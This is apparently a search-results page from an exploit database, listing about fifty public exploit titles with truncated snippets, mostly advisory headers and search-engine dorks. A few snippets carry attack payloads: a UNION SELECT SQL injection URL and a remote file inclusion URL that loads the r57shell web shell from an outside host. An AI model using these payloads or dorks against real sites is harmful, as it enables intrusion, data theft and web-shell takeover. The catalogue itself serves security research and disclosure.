41207 matches found
DZCP (deV!L_z Clanportal) 1.3.6 - Show SQL Injection
DZCP deV!Lz Clanportal 1.3.6 - Show SQL Injection source: https://www.securityfocus.com/bid/21391/info deV!Lz Clanportal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could...
ClipShare 3.0.1 - tid SQL Injection
ClipShare 3.0.1 - tid SQL Injection // / / / Clipshare / / / / Remote SQL Injection Vulnerability / / / / / // AUTHOR : SuNHouSe2 ALGERIAN HaCkEr DORK : "powered by clipshare" VERSION : less than v3.0.1 EXPLOIT :...
Elgg 1.7.10 - Multiple Vulnerabilities
Elgg 1.7.10 - Multiple Vulnerabilities Exploit Title: Elgg 1.7.10 Software Link: http://elgg.org/getelgg.php?forward=elgg-1.7.10.zip Version: 1.7.10 = 1. XSS...
Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass
Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass Sources: https://alephsecurity.com/2017/08/30/untethered-initroot/ https://github.com/alephsecurity/initroot initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass CVE-2016-102...
Microsoft Windows 10 (19031909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow (PoC)
Microsoft Windows 10 19031909 - SMBGhost SMB3.1.1 SMB2COMPRESSIONCAPABILITIES Buffer Overflow PoC CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip Usage ./CVE-2020-0796.py servername This script...
DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection
DZCP deV!Lz Clanportal 1.4.9.6 - Blind SQL Injection use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent-new cookiejar = HTTP::Cookies-new,; $ua-agent 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ; usage; print "\n"; $server = $ARGV0; $dir = $ARGV1; $username = $ARGV2; $password =...
MusicBox 2.3.8 - Multiple Vulnerabilities
MusicBox 2.3.8 - Multiple Vulnerabilities Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities Author : DevilScreaM Date : 25/08/2013 Category : Web Applications Vendor : http://www.musicboxv2.com/ Version : 1.0 - 2.3.8 Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 © 2008...
Revive Adserver 4.2 - Remote Code Execution
Revive Adserver 4.2 - Remote Code Execution Exploit Title: Revive Adserver 4.2 - Remote Code Execution Google Dork: "inurl:www/delivery filetype:php" Exploit Author: crlf Vendor Homepage: https://www.revive-adserver.com/ Software Link: https://www.revive-adserver.com/download/archive/ Version:...
Mikrotik WinBox 6.42 - Credential Disclosure (golang)
Mikrotik WinBox 6.42 - Credential Disclosure golang / Title: Mikrotik WinBox 6.42 - Credential Disclosure golang edition Author: Maxim Yefimenko @slider Date: 2018-08-06 Sotware Link: https://mikrotik.com/download Vendor Page: https://www.mikrotik.com/ Version: 6.29 - 6.42 Tested on: Fedora 28 ...
DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection
DZCP deV!Lz Clanportal Gamebase Addon - SQL Injection ======================================================================================== | Title : deV!Lz Clanportal Gamebase Addon SQL Injection Vulnerability | Author Easy Laster | Download : http://www.modsbar.de/Addons/464/gamebase-addon/ ...
UBBCentral UBB.Threads 6.5.1.1 - doeditconfig.php Code Execution
UBBCentral UBB.Threads 6.5.1.1 - doeditconfig.php Code Execution !/usr/bin/php -q -d shortopentag=on ? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on...
Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution (Metasploit)
Drupal 8.3.9 8.4.6 8.5.1 - Drupalgeddon2 Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupalgeddon2', 'Description' = %q CVE-2018-7600 / SA-CORE-2018-002...
PhotoPost 4.6 - PP_PATH Remote File Inclusion
PhotoPost 4.6 - PPPATH Remote File Inclusion ==================================================================== PhotoPost = 4.6 PPPATH Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi Hackrz...
DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection
DZCP deV!Lz Clanportal Witze Addon 0.9 - SQL Injection ======================================================================================== | Title : deV!Lz Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability | Author : Easy Laster | Download :...
Aardvark Topsites PHP 4.2.2 - path Remote File Inclusion
Aardvark Topsites PHP 4.2.2 - path Remote File Inclusion Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit:...
Xoops 2.5.4 - Blind SQL Injection
Xoops 2.5.4 - Blind SQL Injection ------------------------------------------ Xoops 2.5.4 Blind SQL Injection ------------------------------------------ Dork: "Powered by XOOPS 2.5.4" Download: http://sourceforge.net/projects/xoops/ Date: 10/12/2011 Author: blkhtc0rp Mail: blkhtc0rpatyahoodotcom...
WebcamXP 3.72.4404.05.280 Beta - show_gallery_pic?id Arbitrary Memory Disclosure
WebcamXP 3.72.4404.05.280 Beta - showgallerypic?id Arbitrary Memory Disclosure source: https://www.securityfocus.com/bid/27875/info webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data. Attackers can exploit...
IdeaBox 1.1 - gorumDir Remote File Inclusion
IdeaBox 1.1 - gorumDir Remote File Inclusion $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ IdeaBox = 1.1 gorumDir Remote File Include Vulnerability $$ script site: http://ideabox.phpoutsourcing.com/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$...
PHPizabi 0.848b C1 HP3 - id Local File Inclusion
PHPizabi 0.848b C1 HP3 - id Local File Inclusion source: https://www.securityfocus.com/bid/30707/info PHPizabi is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal...
glFusion 1.1.2 - COM_applyFilter()cookies Blind SQL Injection
glFusion 1.1.2 - COMapplyFiltercookies Blind SQL Injection 1 // Check user status $status = SECcheckUserStatus$userid; if $status == USERACCOUNTACTIVE || $status == USERACCOUNTAWAITINGACTIVATION $userloggedin = 1; SESSupdateSessionTime$sessid, $CONF'cookieip'; ... see SESSupdateSessionTime functi...
Samba 3.6.2 (x86) - Denial of Service (PoC)
Samba 3.6.2 x86 - Denial of Service PoC !/usr/bin/python """ Exploit for Samba vulnerabilty CVE-2015-0240 by sleepya The exploit only targets vulnerable x86 smbd 3.6.24 which 'creds' is controlled by ReferentID field of PrimaryName ServerName. That means 'talloczero' in libtalloc does not write a...
Dnsmasq 2.78 - Information Leak
Dnsmasq 2.78 - Information Leak ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available...
FreeBSD 9.1 - ftpd Remote Denial of Service
FreeBSD 9.1 - ftpd Remote Denial of Service FreeBSD 9.1 ftpd Remote Denial of Service Maksymilian Arciemowicz http://cxsecurity.org/ http://cxsec.org/ Public Date: 01.02.2013 URL: http://cxsecurity.com/issue/WLB-2013020003 --- 1. Description --- I have decided check BSD ftpd servers once again fo...
MWChat 6.7 - Start_Lobby.php Remote File Inclusion
MWChat 6.7 - StartLobby.php Remote File Inclusion source: https://www.securityfocus.com/bid/13849/info MWChat is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to...
MySQL 5.5.45 - procedure analyse Function Denial of Service
MySQL 5.5.45 - procedure analyse Function Denial of Service !/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up:...
webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing
webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O PROUD TO BE SPANISH!...
Responsive FileManager 9.13.4 - Multiple Vulnerabilities
Responsive FileManager 9.13.4 - Multiple Vulnerabilities Responsive FileManager 9.13.4 - Multiple Vulnerabilities Date: December 12, 2018 Author: farisv Vendor Homepage: https://www.responsivefilemanager.com/ Vulnerable Package Link:...
Fusionphp Fusion News 3.33.6 - X-Forworded-For PHP Script Code Injection
Fusionphp Fusion News 3.33.6 - X-Forworded-For PHP Script Code Injection source: https://www.securityfocus.com/bid/13661/info FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Th...
Ebay Clone from clone2009 - SQL Injection
Ebay Clone from clone2009 - SQL Injection / Name : Ebay Clone from clone2009.com Site : http://www.clone2009.com/ Author : Hamza 'MizoZ' N. Email : mizozxatgmaildotcom Greetz : Zuka , GreyMen : / 1st SQL injection : File : gotourl.php , Get : id HOST/PATH/gotourl.php?id=-1+union+select+version-- ...
Dnsmasq 2.78 - Lack of free() Denial of Service
Dnsmasq 2.78 - Lack of free Denial of Service ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the...
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Date: 2020-02-28 Exploit Author: Photubias Vendor Advisory: 1...
Dnsmasq 2.78 - 2-byte Heap Overflow
Dnsmasq 2.78 - 2-byte Heap Overflow ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open three terminals docker build...
Dnsmasq 2.78 - Heap Overflow
Dnsmasq 2.78 - Heap Overflow ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsma...
Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting
Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting Exploit Title: Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting Date: 2020-02-18 Vendor Homepage: https://wpforms.com Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/developers Exploit Author: Jinson...
YNP Portal System 2.2.0 - showpage.cgi p Remote File Disclosure
YNP Portal System 2.2.0 - showpage.cgi p Remote File Disclosure YNP Portal System 2.2.0 showpage.cgi p Remote File Disclosure Vulnerability D0RK : inurl:"showpage.cgi?p=popsearch.html" : inurl:"showpage.cgi?p=support.html" : inurl:"showpage.cgi?p=dialup.html" : inurl:"showpage.cgi?p=" POC:...
PHP Script Tools PSY Auction - item.php?id SQL Injection
PHP Script Tools PSY Auction - item.php?id SQL Injection source: https://www.securityfocus.com/bid/17974/info PSY Auction is prone to multiple input-validation vulnerabilities. The issues include HTML-injection and SQL-injection vulnerabilities. These issues are due to a failure in the applicatio...
zFTPServer Suite 6.0.0.52 - rmdir Directory Traversal
zFTPServer Suite 6.0.0.52 - rmdir Directory Traversal !/usr/bin/perl Advisory: zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal Author: Stefan Schurtz Contact: [email protected] Affected Software: Successfully tested on zFTPServer Suite 6.0.0.52 Vendor URL: http://www.zftpserver.com/ Vend...
TLS - Renegotiation
TLS - Renegotiation !/usr/bin/env python RedTeam Pentesting GmbH [email protected] http://www.redteam-pentesting.de PoC exploit for the TLS renegotiation vulnerability CVE-2009-3555 License ------- CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ Timeline -------- 2009-12-21...
SweetRice 1.5.1 - Backup Disclosure
SweetRice 1.5.1 - Backup Disclosure Title: SweetRice 1.5.1 - Backup Disclosure Application: SweetRice Versions Affected: 1.5.1 Vendor URL: http://www.basic-cms.org/ Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip Discovered by: Ashiyane Digital Security Team Tested on: Windo...
OpenVPN 2.2.29 - Shellshock Remote Command Injection
OpenVPN 2.2.29 - Shellshock Remote Command Injection Exploit Title: ShellShock OpenVPN Exploit Date: Fri Oct 3 15:48:08 EDT 2014 Exploit Author: hobbily AKA @fj33r Version: 2.2.29 Tested on: Debian Linux CVE : CVE-2014-6271 Probably should of submitted this the day I tweeted it. server.conf port...
Linux Kernel 4.11.8 - mq_notify: double sock_put() Local Privilege Escalation
Linux Kernel 4.11.8 - mqnotify: double sockput Local Privilege Escalation / CVE-2017-11176: "mqnotify: double sockput" by LEXFO 2018. DISCLAIMER: The following code is for EDUCATIONAL purpose only. Do not use it on a system without authorizations. WARNING: The exploit WILL NOT work on your target...
CuteNews 1.4.1 - show_news.php Cross-Site Scripting
CuteNews 1.4.1 - shownews.php Cross-Site Scripting source: https://www.securityfocus.com/bid/16740/info CuteNews is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before including it in dynamically generate...
RemoteMouse 3.008 - Arbitrary Remote Command Execution
RemoteMouse 3.008 - Arbitrary Remote Command Execution Exploit Title: Remote Mouse 3.008 - Failure to Authenticate Date: 2019-09-04 Exploit Author: 0rphon Software Link: https://www.remotemouse.net/ Version: 3.008 Tested on: Windows 10 Remote Mouse 3.008 fails to check for authenication and will...
ClanSphere 2011.3 - cs_lang Cookie Local File Inclusion
ClanSphere 2011.3 - cslang Cookie Local File Inclusion Exploit Title: ClanSphere 2011.3 cslang cookie parameter Local File Include Vulnerability Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere Date: 10/22/2012 Author: Marco Tulio blkhtc0rp Vendor...
lighttpd - Denial of Service (PoC)
lighttpd - Denial of Service PoC 29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that modauth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: "src/httpauth.c:67"...
Gallery 2.0 - main.php Directory Traversal
Gallery 2.0 - main.php Directory Traversal source: https://www.securityfocus.com/bid/15108/info Gallery is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. Exploitation of this vulnerability could lead to a...
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Metasploit Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. Google Dork: intext:"Please Login" inurl:"/remote/login" Date: 17/08/2019 Exploit Author: Carlos E. Vieira Vendor Homepage:...
phpCodeGenie 3.0.2 - BEAUT_PATH Remote File Inclusion
phpCodeGenie 3.0.2 - BEAUTPATH Remote File Inclusion / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie app/common/lib/codeBeautifier/Beautifier/Core.php line 20-25: .... includeonce$BEAUTPATH."/Beautifier/HFile.php"; includeonce$BEAUTPATH."/Beautifier/Context.php"; class Core...
TSEP 0.942 - colorswitch.php Remote File Inclusion
TSEP 0.942 - colorswitch.php Remote File Inclusion Script: TSEP Comments: "registerglobals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098 Vulnerable Files/Code: ./tsep.0942/include/colorswitch.php?tsepconfigabsPath=http://rst.void.ru/download/r57shell.txt?...
Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
Alcatel-Lucent Nokia GPON I-240W-Q - Buffer Overflow !/usr/bin/python3 import argparse import requests import urllib.parse import binascii import re def runtarget: """ Execute exploitation """ We're using CVE-2018-10561 and/or it's extension in order to exploit this Authenticated RCE in usbForm...